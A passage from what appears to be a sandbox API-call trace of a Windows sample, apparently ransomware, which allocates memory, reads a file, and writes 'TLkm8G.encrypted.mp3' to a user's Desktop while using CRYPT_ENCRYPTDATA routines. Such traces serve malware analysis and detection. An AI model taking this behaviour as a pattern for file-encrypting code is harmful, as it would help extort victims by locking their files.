lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.472] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0030.472] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.472] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0030.473] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0030.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0030.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tlkm8g.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0030.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0030.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.474] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0030.475] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.475] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0030.475] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0030.476] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.476] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0030.477] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x65c8, lpOverlapped=0x0) returned 1 [0030.479] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x165c8) returned 0x8affc0 [0030.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x165c8) returned 0x8c6590 [0030.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0030.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.482] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x165c8) returned 0x8affc0 [0030.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0030.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.484] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0030.484] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.484] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x165c8) returned 0x8affc0 [0030.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0030.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0030.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0030.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x165c8) returned 0x8dcb60 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.488] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0030.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.488] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3a8 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.489] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.489] 